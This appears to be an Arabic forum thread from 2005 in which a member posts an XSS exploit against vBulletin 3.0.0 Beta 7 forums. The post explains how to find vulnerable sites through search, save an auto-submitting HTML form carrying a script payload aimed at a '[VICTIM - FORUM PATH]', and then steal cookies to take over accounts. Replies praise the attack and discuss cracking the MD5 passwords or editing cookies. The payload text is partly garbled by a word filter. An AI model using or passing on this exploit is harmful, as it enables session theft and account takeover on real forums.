للتسجيل
 
 

العودة   منتديات الحمادين > المنتديات التقنية > منتدى الكمبيوتر والأنترنت

منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا

الإهداءات
جدتهم ومنقدتهم اليوم 11:15 AM
صباح الخير يالحمادين ******** عسكم بخيرر ******** لايفوتكم موضوع جدتكم بهمس القوافي ********الدعوه للشعراء اولن ********ولمتذوقي الشعر ثانيا****

ريوف اليوم 08:02 AM
الله يبارك فيك الدلوعه مشكورشقران واورنس والجميع وشكر خاص خاص خاص الي رجل المنتدى المتألق ابونادر

دلوعة زماني يوم أمس 11:37 PM
الف الف مبرووك لريووفه وحلالاوي ع الالفيه الاولى ومبرووك المنصب ريووفه تستاهلين غلاتي

ريوف يوم أمس 11:07 PM
الله يبارك فيك وانا اقولكم مشكورين الحمادين اول يوم دخلت قلت قهوتكم بارده الحمادين والحين انا الي ضعت ابكرم الحمادين ويعطيكم العافيه

آورنس يوم أمس 09:48 PM
الف الف الف مبرووووووووووووووك يا ريوووووووووف على الترقيه من جد تستاهلين هااااااااع الف الف مبروك والله وسويتيهااا **** مبروك

بقايا انسان يوم أمس 07:44 PM
مبـــــــــــــــــــــــــــــرووووووووك الالــــــــــــــفيـــــه ريوف

راعي المعطا يوم أمس 07:33 PM
السلام عليكم ****************وينك ياعزيز النفس******************** سوال وجواب عندك

لامبارد يوم أمس 07:25 PM
ريووووووووووووف ألف ألف مبروووووووك ع الالفية************

شقران يوم أمس 07:13 PM
**************** ياويلنا من ريوف************ حتى منتدى الشعر العام************ ماسلم منها

شقران يوم أمس 12:07 PM
اعتذار******** هجدتلي قومن بمنتداهم******** وواعدوني الخميس******** بيجيبون شاعرن اقشر وانا احب القشاره******** وارجو تأجيل المحاوره الأسبوع الجاي


إضافة رد
 
أدوات الموضوع إبحث في الموضوع
  #1  
قديم 19-Mar-2005, 05:23 PM
islamm2003 islamm2003 غير متصل
عـضـو جديد
 
تاريخ التسجيل: Mar 2005
العمر: 26
المشاركات: 13
ثغرة فى منتديات vb

بسم الله الحمن الرحيم
--------------------------------
الكاتب :islamm2003
الحقوق محفوظه للكاتب islamm203
--------------------------
الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه
--------------------------------
اول شئ روح لموقع البحث مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


ابحث عن هذه الكلمه
vBulletin v3.0.0 Beta 7



----------------------------------------------
خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html



كود:


كود:
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------

مثل هذه الموقع مصاب بالثغره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه



احفظ الملف بمتداد html


------------------------------------------------
افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان



الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php

تحياتي
رد مع اقتباس
  #2  
قديم 20-Mar-2005, 03:19 AM
الصورة الرمزية الدويله
الدويله الدويله غير متصل
[ مـتـمـيـز ]
 
تاريخ التسجيل: Mar 2005
الدولة: حيث ماكنت أكون
العمر: 26
المشاركات: 424
اخوي islamm2003 بارك الله فيك وماقصرت

مجهود تشكر عليه بصراحه

لا شلت يمينك اخي

مواضيعك متميزه دائما كتميز صاحبها

ننتظر المزيد
رد مع اقتباس
  #3  
قديم 13-Apr-2005, 04:19 PM
ابو سارة ابو سارة غير متصل
مشرف المنتديات العامه
 
تاريخ التسجيل: Apr 2005
العمر: 29
المشاركات: 177
مشاركة: ثغرة فى منتديات vb

islamm2003


يعطيك العافيه اخوي وماقصرت

ومجهود رائع
__________________
[poem font="Simplified Arabic,4,blue,normal,normal" bkcolor="transparent" bkimage="backgrounds/20.gif" border="double,7,darkblue" type=0 line=0 align=center use=ex num="0,black"]
من يجهل أسلوب المكر عاش محتار= ومن يلبس ثياب الكبر مات عـاري
والدمعه اللي تحتري حزن الأعـذار= ماظنها تنفـع ضعيـف المـواري
ماللصقر حشمـه وقيمـه ومقـدار= أن كان مايدمي صـدور الحبـاري[/poem]
رد مع اقتباس
  #4  
قديم 20-Apr-2005, 03:13 PM
الخـارج عن القـانون الخـارج عن القـانون غير متصل
عـضـو مـاسـي
 
تاريخ التسجيل: Apr 2005
الدولة: تورا بورا
العمر: 28
المشاركات: 148
مشاركة: ثغرة فى منتديات vb

اخوي اسلام ما قصرت ويعطيك العافيه.... بس الثغره قديمه شوي :) وغير كذا للأسف الباس ورد اللي تنتج عن هذي الثغره هي باس ورد مشفره تشفير md5 والمصيبه العضما انها تختلف عن تشفير الجيل الثاني للمنتديات المصابه هذا النوع اللي هو الجيل الثالث مشفر تشفير md5 معقد ومضيوف عليه خانتين وهميات يعني مشفر مرتين الشي اللي يجعل فكه مستحيل اذاً الحل هنا هو معدل الكوكيز وهذا ايضاً ما ينفع مع التشفير مرتني للجيل الثالث فهوه يتخدم نضام اخر زيارة.... على العموم انت ما قصرت ويعطيك العافيه ومشكورررر :)
رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd موقع
--:: تصميم عبادى نت للتصميم والإستضافة ::--
الحقوق محفوظة

SEO by bdr130.net 3.0.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61